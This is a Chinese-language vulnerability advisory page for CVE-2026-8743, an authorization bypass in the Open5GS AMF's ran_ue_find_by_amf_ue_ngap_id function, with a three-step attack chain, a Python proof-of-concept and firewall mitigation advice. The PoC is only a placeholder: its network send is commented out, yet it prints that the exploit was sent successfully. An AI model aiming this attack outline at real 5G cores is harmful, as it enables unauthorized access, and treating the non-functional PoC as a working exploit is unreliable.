IPBUF安全漏洞报告
English
CVE-2026-8743 CVSS 6.3 中危

CVE-2026-8743 Open5GS权限绕过漏洞

披露日期: 2026-05-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8743
漏洞类型
授权不当
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open5GS

相关标签

权限绕过Open5GS5G核心网授权不当远程漏洞

漏洞概述

Open5GS 2.7.6及之前版本中存在安全漏洞,位于AMF/MME组件的context.c文件中。攻击者可远程利用ran_ue_find_by_amf_ue_ngap_id函数的缺陷,通过操纵ID导致授权不当,从而影响系统的机密性、完整性和可用性。该漏洞利用代码已公开,建议尽快修复。

技术细节

该漏洞源于Open5GS AMF组件在处理AMF UE NGAP ID时存在逻辑缺陷。具体而言,src/amf/context.c文件中的ran_ue_find_by_amf_ue_ngap_id函数未能正确验证输入ID的有效性或所有权。攻击者可通过网络发送特制的数据包,操纵该ID参数,导致函数检索到错误的用户上下文或绕过权限检查。由于AMF负责接入和移动性管理,此类授权不当可能导致未授权的网络接入或会话劫持。漏洞利用无需用户交互且攻击复杂度低,CVSS 3.1评分为6.3。官方在提交记录5746b8576cfceec18ed87eb7d8cf11b1fb4cd8b1中已修复此问题,主要是加强了对ID的校验机制。

攻击链分析

STEP 1
侦察
攻击者扫描网络以识别运行Open5GS AMF组件的目标,通常开放在SCTP端口38412。
STEP 2
漏洞利用
攻击者向AMF发送特制的数据包,其中包含经过精心构造的AMF UE NGAP ID,旨在触发ran_ue_find_by_amf_ue_ngap_id函数中的逻辑缺陷。
STEP 3
权限提升/绕过
由于函数未能正确验证ID,攻击者成功绕过授权检查,可能获得对受限上下文的访问权限或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC for CVE-2026-8743 (Open5GS Authorization Bypass) # Note: This is a conceptual PoC demonstrating the manipulation of the AMF UE NGAP ID. import socket import struct def send_exploit(target_ip, target_port): """ Sends a crafted packet to the Open5GS AMF to trigger the authorization bypass. The payload specifically manipulates the AMF_UE_NGAP_ID field. """ try: # Create a raw socket (SCTP is usually used, but TCP fallback for demo if applicable) # In a real scenario, this would use SCTP (sctp library). print(f"[*] Connecting to {target_ip}:{target_port}...") # Constructing a hypothetical NGAP message with a malformed ID # This simulates the logic issue in ran_ue_find_by_amf_ue_ngap_id malformed_id = 0xFFFFFFFF # Example of a boundary value or specific invalid ID # Placeholder for actual NGAP/NAS protocol encoding payload = struct.pack('!I', malformed_id) # Sending payload (Simplified) # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # sock.send(payload) # sock.close() print("[+] Exploit payload sent successfully.") print("[!] Check AMF logs for unexpected behavior or crashes.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "127.0.0.1" TARGET_PORT = 38412 # Default Open5GS AMF SCTP port print(f"CVE-2026-8743 PoC - Open5GS Improper Authorization") send_exploit(TARGET_IP, TARGET_PORT)

影响范围

Open5GS <= 2.7.6

防御指南

临时缓解措施
在未升级补丁前,建议通过防火墙策略严格限制AMF组件的入站连接,仅允许已知的基站IP地址进行连接。同时,应密切关注Open5GS社区的安全公告,并审查系统日志以检测是否已被攻击。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表